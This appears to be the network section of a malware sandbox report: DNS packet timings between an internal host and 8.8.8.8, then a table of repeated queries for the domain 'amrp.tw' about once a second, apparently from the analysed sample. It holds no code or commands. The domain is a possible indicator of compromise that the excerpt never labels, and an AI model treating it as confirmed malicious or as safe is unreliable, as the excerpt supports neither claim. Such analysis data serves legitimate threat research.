Apr 29, 2021 09:18:31.716917038 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:32.728730917 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:32.780371904 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:33.698843956 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:33.747503996 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:36.618891954 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:36.667828083 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:37.538656950 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:37.587595940 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:38.441284895 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:38.489990950 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:43.908260107 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:44.239553928 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:44.374882936 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:44.432842016 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:45.509217024 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:45.553066969 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:45.561718941 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:45.604636908 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:46.625754118 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:46.687691927 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:47.960091114 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:48.282706022 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:49.523097038 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:49.588376045 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:50.755672932 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:50.812793970 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:52.032917976 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:52.081583977 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:52.214489937 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:52.276906013 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:53.266635895 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:53.318711996 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:54.710226059 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:54.767065048 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:55.348095894 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:55.399740934 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:55.942588091 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:56.004842997 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:57.186348915 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:57.235091925 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:58.425035954 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:58.484735966 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:59.722589970 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:59.771270990 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:01.088252068 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:01.145457029 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:02.430881023 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:02.479594946 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:04.103687048 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:04.152384043 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:05.360806942 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:05.409497023 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:06.778059959 CEST | 62938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:06.837114096 CEST | 53 | 62938 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:08.041354895 CEST | 55708 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:08.379918098 CEST | 53 | 55708 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:09.546783924 CEST | 56803 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:09.595403910 CEST | 53 | 56803 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:10.954329014 CEST | 57145 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:11.014369965 CEST | 53 | 57145 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:12.173955917 CEST | 55359 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:12.231287003 CEST | 53 | 55359 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:12.464621067 CEST | 58306 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:12.521852970 CEST | 53 | 58306 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:12.544292927 CEST | 64124 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:12.603148937 CEST | 53 | 64124 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:13.673806906 CEST | 49361 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:13.730776072 CEST | 53 | 49361 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:14.969868898 CEST | 63150 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:15.018480062 CEST | 53 | 63150 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:16.470176935 CEST | 53279 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:16.796936035 CEST | 53 | 53279 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:18.035713911 CEST | 56881 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:18.092744112 CEST | 53 | 56881 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:19.365402937 CEST | 53642 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:19.426115036 CEST | 53 | 53642 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:21.870687008 CEST | 55667 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:21.933243036 CEST | 53 | 55667 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:23.167947054 CEST | 54833 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:23.227627039 CEST | 53 | 54833 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:24.410850048 CEST | 62476 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:24.459515095 CEST | 53 | 62476 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:25.627330065 CEST | 49705 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:25.684412956 CEST | 53 | 49705 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:26.869585991 CEST | 61477 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:26.919786930 CEST | 53 | 61477 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:28.094182968 CEST | 61633 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:28.144623995 CEST | 53 | 61633 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:29.350225925 CEST | 55949 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:29.400669098 CEST | 53 | 55949 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:30.584069967 CEST | 57601 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:30.643527031 CEST | 53 | 57601 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:31.887809038 CEST | 49342 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:31.950686932 CEST | 53 | 49342 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:33.286051035 CEST | 56253 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:33.343103886 CEST | 53 | 56253 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:33.954797029 CEST | 49667 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:34.027405977 CEST | 53 | 49667 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:34.566128969 CEST | 55439 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:34.876245975 CEST | 57069 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:34.888900995 CEST | 53 | 55439 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:34.937447071 CEST | 53 | 57069 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:36.116091967 CEST | 57659 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:36.164630890 CEST | 53 | 57659 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:37.507352114 CEST | 54717 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:37.556483030 CEST | 53 | 54717 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:38.747144938 CEST | 63975 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:38.812598944 CEST | 53 | 63975 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:40.022133112 CEST | 56639 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:40.082376003 CEST | 53 | 56639 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:41.491259098 CEST | 51856 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:41.539858103 CEST | 53 | 51856 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:42.701021910 CEST | 56546 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:42.752437115 CEST | 53 | 56546 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:43.965801954 CEST | 62152 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:44.017335892 CEST | 53 | 62152 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:45.185405970 CEST | 53470 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:45.234781027 CEST | 53 | 53470 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:46.400294065 CEST | 56446 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:46.451890945 CEST | 53 | 56446 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:19:47.609278917 CEST | 59631 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:19:47.658653975 CEST | 53 | 59631 | 8.8.8.8 | 192.168.2.3
                                            Apr 29, 2021 09:19:48.818216085 CEST5551553192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:48.866684914 CEST53555158.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:50.033618927 CEST6454753192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:50.082341909 CEST53645478.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:51.255209923 CEST5175953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:51.312139988 CEST53517598.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:52.671220064 CEST5920753192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:52.719798088 CEST53592078.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:54.067848921 CEST5426953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:54.116540909 CEST53542698.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:56.180576086 CEST5485653192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:56.242844105 CEST53548568.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:57.420135021 CEST6414053192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:57.469484091 CEST53641408.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:58.629303932 CEST6227153192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:58.686525106 CEST53622718.8.8.8192.168.2.3
                                            Apr 29, 2021 09:19:59.913496017 CEST5740453192.168.2.38.8.8.8
                                            Apr 29, 2021 09:19:59.962209940 CEST53574048.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:01.143604994 CEST6299753192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:01.195081949 CEST53629978.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:02.340274096 CEST5771253192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:02.389657974 CEST53577128.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:03.541687965 CEST6006553192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:03.590300083 CEST53600658.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:04.762628078 CEST5506853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:04.811296940 CEST53550688.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:05.955463886 CEST6470053192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:06.004157066 CEST53647008.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:07.380706072 CEST6199853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:07.429529905 CEST53619988.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:08.573776007 CEST5372453192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:08.622603893 CEST53537248.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:08.645178080 CEST5232853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:08.696721077 CEST53523288.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:09.775473118 CEST5805153192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:09.824177027 CEST53580518.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:10.262276888 CEST6413053192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:10.327508926 CEST53641308.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:11.026552916 CEST5049153192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:11.075330019 CEST53504918.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:12.237430096 CEST5300453192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:12.299365997 CEST53530048.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:13.507350922 CEST5252953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:13.556083918 CEST53525298.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:15.456970930 CEST5365653192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:15.505681992 CEST53536568.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:16.708456039 CEST6272453192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:16.760174990 CEST53627248.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:17.914839029 CEST5605953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:17.972099066 CEST53560598.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:19.668833971 CEST6306053192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:19.717551947 CEST53630608.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:20.892060041 CEST5149853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:20.940669060 CEST53514988.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:22.123450994 CEST5994353192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:22.172164917 CEST53599438.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:23.567308903 CEST5011853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:23.616051912 CEST53501188.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:24.787410021 CEST5835753192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:24.835859060 CEST53583578.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:26.005192995 CEST5580453192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:26.056761026 CEST53558048.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:27.231012106 CEST5807953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:27.280750036 CEST53580798.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:28.440010071 CEST5208053192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:28.491605997 CEST53520808.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:29.635910988 CEST5523853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:29.685062885 CEST53552388.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:30.821522951 CEST4928953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:30.883424997 CEST53492898.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 29, 2021 09:18:43.908260107 CEST | 192.168.2.3 | 8.8.8.8 | 0x2b69 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:45.509217024 CEST | 192.168.2.3 | 8.8.8.8 | 0x8e1c | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:46.625754118 CEST | 192.168.2.3 | 8.8.8.8 | 0x4fc8 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:47.960091114 CEST | 192.168.2.3 | 8.8.8.8 | 0xcd34 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:49.523097038 CEST | 192.168.2.3 | 8.8.8.8 | 0x480d | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:50.755672932 CEST | 192.168.2.3 | 8.8.8.8 | 0x1402 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:52.032917976 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b96 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:53.266635895 CEST | 192.168.2.3 | 8.8.8.8 | 0xd84f | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:54.710226059 CEST | 192.168.2.3 | 8.8.8.8 | 0x5926 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:55.942588091 CEST | 192.168.2.3 | 8.8.8.8 | 0x22a2 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:57.186348915 CEST | 192.168.2.3 | 8.8.8.8 | 0xfa8f | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:58.425035954 CEST | 192.168.2.3 | 8.8.8.8 | 0xa774 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:59.722589970 CEST | 192.168.2.3 | 8.8.8.8 | 0x61cc | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:01.088252068 CEST | 192.168.2.3 | 8.8.8.8 | 0x9a4c | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:02.430881023 CEST | 192.168.2.3 | 8.8.8.8 | 0x43c6 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:04.103687048 CEST | 192.168.2.3 | 8.8.8.8 | 0xfe5a | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:05.360806942 CEST | 192.168.2.3 | 8.8.8.8 | 0x17f9 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:06.778059959 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a1e | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:08.041354895 CEST | 192.168.2.3 | 8.8.8.8 | 0xccaa | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:09.546783924 CEST | 192.168.2.3 | 8.8.8.8 | 0xc64c | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:10.954329014 CEST | 192.168.2.3 | 8.8.8.8 | 0x68e0 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:12.173955917 CEST | 192.168.2.3 | 8.8.8.8 | 0x2876 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:13.673806906 CEST | 192.168.2.3 | 8.8.8.8 | 0xce16 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:14.969868898 CEST | 192.168.2.3 | 8.8.8.8 | 0x29d3 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:16.470176935 CEST | 192.168.2.3 | 8.8.8.8 | 0xafac | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:18.035713911 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b8 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:19.365402937 CEST | 192.168.2.3 | 8.8.8.8 | 0x13c4 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:21.870687008 CEST | 192.168.2.3 | 8.8.8.8 | 0x9871 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:23.167947054 CEST | 192.168.2.3 | 8.8.8.8 | 0x7b23 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:24.410850048 CEST | 192.168.2.3 | 8.8.8.8 | 0x78b1 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:25.627330065 CEST | 192.168.2.3 | 8.8.8.8 | 0xf5e4 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:26.869585991 CEST | 192.168.2.3 | 8.8.8.8 | 0x52be | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:28.094182968 CEST | 192.168.2.3 | 8.8.8.8 | 0xa4f5 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:29.350225925 CEST | 192.168.2.3 | 8.8.8.8 | 0x4bc1 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:30.584069967 CEST | 192.168.2.3 | 8.8.8.8 | 0xd129 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:31.887809038 CEST | 192.168.2.3 | 8.8.8.8 | 0xdc08 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:33.286051035 CEST | 192.168.2.3 | 8.8.8.8 | 0xa855 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:34.566128969 CEST | 192.168.2.3 | 8.8.8.8 | 0x61c5 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:36.116091967 CEST | 192.168.2.3 | 8.8.8.8 | 0x5df7 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:37.507352114 CEST | 192.168.2.3 | 8.8.8.8 | 0xb5db | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:38.747144938 CEST | 192.168.2.3 | 8.8.8.8 | 0xb1 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:40.022133112 CEST | 192.168.2.3 | 8.8.8.8 | 0xa5e3 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:41.491259098 CEST | 192.168.2.3 | 8.8.8.8 | 0x2888 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:42.701021910 CEST | 192.168.2.3 | 8.8.8.8 | 0xd791 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:43.965801954 CEST | 192.168.2.3 | 8.8.8.8 | 0x1901 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:45.185405970 CEST | 192.168.2.3 | 8.8.8.8 | 0x447a | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:46.400294065 CEST | 192.168.2.3 | 8.8.8.8 | 0xeec3 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:47.609278917 CEST | 192.168.2.3 | 8.8.8.8 | 0x1f27 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:48.818216085 CEST | 192.168.2.3 | 8.8.8.8 | 0xed14 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:50.033618927 CEST | 192.168.2.3 | 8.8.8.8 | 0xe8ca | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:51.255209923 CEST | 192.168.2.3 | 8.8.8.8 | 0xf569 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:52.671220064 CEST | 192.168.2.3 | 8.8.8.8 | 0xd945 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:54.067848921 CEST | 192.168.2.3 | 8.8.8.8 | 0xfafa | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:56.180576086 CEST | 192.168.2.3 | 8.8.8.8 | 0xd452 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:57.420135021 CEST | 192.168.2.3 | 8.8.8.8 | 0x13f0 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:58.629303932 CEST | 192.168.2.3 | 8.8.8.8 | 0xf5a2 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:59.913496017 CEST | 192.168.2.3 | 8.8.8.8 | 0x7159 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:01.143604994 CEST | 192.168.2.3 | 8.8.8.8 | 0x4a53 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:02.340274096 CEST | 192.168.2.3 | 8.8.8.8 | 0xe7dc | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:03.541687965 CEST | 192.168.2.3 | 8.8.8.8 | 0xa455 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:04.762628078 CEST | 192.168.2.3 | 8.8.8.8 | 0xfc3a | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:05.955463886 CEST | 192.168.2.3 | 8.8.8.8 | 0xfe32 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:07.380706072 CEST | 192.168.2.3 | 8.8.8.8 | 0x512 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:08.573776007 CEST | 192.168.2.3 | 8.8.8.8 | 0xddeb | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:09.775473118 CEST | 192.168.2.3 | 8.8.8.8 | 0xa236 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:11.026552916 CEST | 192.168.2.3 | 8.8.8.8 | 0x55f2 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:12.237430096 CEST | 192.168.2.3 | 8.8.8.8 | 0x9cec | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
